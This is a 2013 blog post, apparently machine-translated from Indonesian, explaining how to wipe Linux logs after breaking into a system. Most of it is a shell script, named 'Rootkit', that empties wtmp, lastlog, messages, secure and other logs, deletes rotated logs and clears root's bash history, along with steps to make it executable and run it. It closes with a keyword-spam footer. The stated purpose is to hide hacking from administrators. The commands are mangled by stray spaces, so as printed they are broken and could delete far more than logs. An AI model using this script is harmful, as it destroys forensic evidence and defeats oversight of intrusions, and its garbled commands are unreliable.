Tuesday, April 16, 2013

How to Erase Log In Linux After Penetration

afternoon friends, exhausted earlier ane streets blog to friends and forums IBT, ane nih find any good thread, which is about how to delete the logs on Linux after penetration. ane get a this information from friends ane friend gnome_selpa.
so without us knowing, as we do the hacking and cracking activity, we trace the form of browsing, scanning, etc. will be stored in their caching server and the admin can easily find us the tracker.
indeed, we could use firefox autoproxynya to disguise our public IP.
directly to the scene friends: D

First, copy and paste and save this file:

echo> / var / log / wtmp

echo> / var / log / lastlog

echo> / var / log / messages

echo> / var / log / secure

echo> / var / log / maillog

echo> / var / log / xferlog


rm-rf / var / log / *. old &> / dev / null

rm-rf / var / log / * .0 &> / dev / null

rm-rf / var / log / * .1 &> / dev / null

rm-rf / var / log / * .2 &> / dev / null

rm-rf / var / log / * .3 &> / dev / null

rm-rf / var / log / *. gz &> / dev / null


rm-rf / var / log / samba / *. old &> / dev / null

rm-rf / var / log / samba / * .0 &> / dev / null

rm-rf / var / log / samba / * .1 &> / dev / null

rm-rf / var / log / samba / * .2 &> / dev / null

rm-rf / var / log / samba / * .3 &> / dev / null

rm-rf / var / log / samba / *. gz &> / dev / null


rm-rf / var / log / apt / *. old &> / dev / null

rm-rf / var / log / apt / * .0 &> / dev / null

rm-rf / var / log / apt / * .1 &> / dev / null

rm-rf / var / log / apt / * .2 &> / dev / null

rm-rf / var / log / apt / * .3 &> / dev / null

rm-rf / var / log / apt / *. gz &> / dev / null


rm-rf / var / log / gdm / *. old &> / dev / null

rm-rf / var / log / gdm / * .0 &> / dev / null

rm-rf / var / log / gdm / * .1 &> / dev / null

rm-rf / var / log / gdm / * .2 &> / dev / null

rm-rf / var / log / gdm / * .3 &> / dev / null

rm-rf / var / log / gdm / *. gz &> / dev / null


rm-rf / var / log / cups / *. old &> / dev / null

rm-rf / var / log / cups / * .0 &> / dev / null

rm-rf / var / log / cups / * .1 &> / dev / null

rm-rf / var / log / cups / * .2 &> / dev / null

rm-rf / var / log / cups / * .3 &> / dev / null

rm-rf / var / log / cups / *. gz &> / dev / null

history-c

echo> / root / .bash_history

save it as Rootkit.

I run the file was removed existent Rootkit.txt example (meaning friend had to remove his txt existent, so be Rootkit only). Then made to root permissions (file permissions) to be executed.


jalaninnya created in the terminal, type:

chmod + x Rootkit


after it is run by typing:

. / Rootkit

and finally we've delete all the logs when scanning, penetration, hacking, and cracking earlier.

for more details can check at: here


or to a forum: here

source : sonyrimawanadhysaputra.blogspot.com

No comments:

Post a Comment

semarang jawa tengah indonesia service keyboard service computer komputer kendal bali setting hotspot hacking password mysql protected username jasa setting jual beli
bobol password phpmyadmin debian 5 lenny ubuntu server surabaya sumatera american inggris access point microtic MikroTik jawa barat yamaha roland casio korg technic floppy disk emulator usb www universal cara ganti broadcast editing wireless Wi-Fi handphone novel health facebook Sepeda Fixie Jual Beli Sepeda Fixie Rose Network Sepeda Fixie Murah Wimax Wimax Indonesia, Long time waktu lorong waktu facebook twitter

Followers